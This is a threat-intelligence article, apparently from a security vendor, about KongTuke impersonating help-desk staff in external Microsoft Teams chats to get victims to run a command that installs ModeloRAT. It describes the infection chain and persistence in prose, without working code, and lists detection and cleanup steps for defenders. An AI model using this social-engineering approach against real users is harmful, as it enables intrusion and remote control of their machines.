KongTuke, a financially motivated initial access broker, is now using external Microsoft Teams chats to impersonate help-desk staff and push ModeloRAT onto Windows machines. ReliaQuest reported the campaign on May 14, 2026, describing it as the first time the group has been seen using a collaboration platform instead of relying only on web-based ClickFix-style delivery [1].
The shift matters because Teams chat changes the user’s threat model. A fake support message does not arrive like a suspicious email; it appears inside the same work interface employees use every day. Microsoft Teams external access is designed to let users communicate with people outside their organization, but broad federation also gives attackers a direct line to employees unless it is restricted or monitored [2].
Why This Is More Than Another ClickFix Variant
ReliaQuest says the chain can move from first chat contact to persistent access in under five minutes. The attacker uses a support-themed pretext, directs the victim to run a diagnostic-style command, and drops a portable WinPython environment under %APPDATA%RoamingWPy64-*. That runtime then carries ModeloRAT modules, host reconnaissance, multiple command-and-control paths, and layered persistence.
The useful detection point is not a single sender domain. KongTuke reportedly rotated through multiple Microsoft 365 tenants, which means static blocking will age badly. Defenders should correlate the sequence: external Teams contact, hidden PowerShell from Windows Run, a new WPy64-* directory in AppData, pythonw.exe activity, Startup folder changes, Run key entries, and suspicious scheduled tasks. One weak signal may be noise; the sequence is the incident.
This also changes response. Removing one payload, blocking one C2 address, or deleting one Run key is not enough if the host has several persistence triggers. Before returning a machine to production, enumerate Startup items, Run keys, scheduled tasks, portable Python folders, recent cloud-download artifacts, and outbound connections from pythonw.exe. If a user was contacted over Teams, review external chat events and whether the sender tenant should have been allowed to reach users at all.
Gridinsoft has tracked related patterns before, including ClickFix WordPress attacks pushing Vidar Stealer and Teams phishing used in MuddyWater’s Chaos ransomware masquerade. KongTuke sits between those two patterns: it keeps the paste-and-run user manipulation of ClickFix, but moves the trust hook into collaboration chat where many organizations have weaker guardrails than email.
Microsoft-themed lures are also shifting toward session abuse: device code phishing shows how a legitimate login page can be used to authorize an attacker-controlled session.
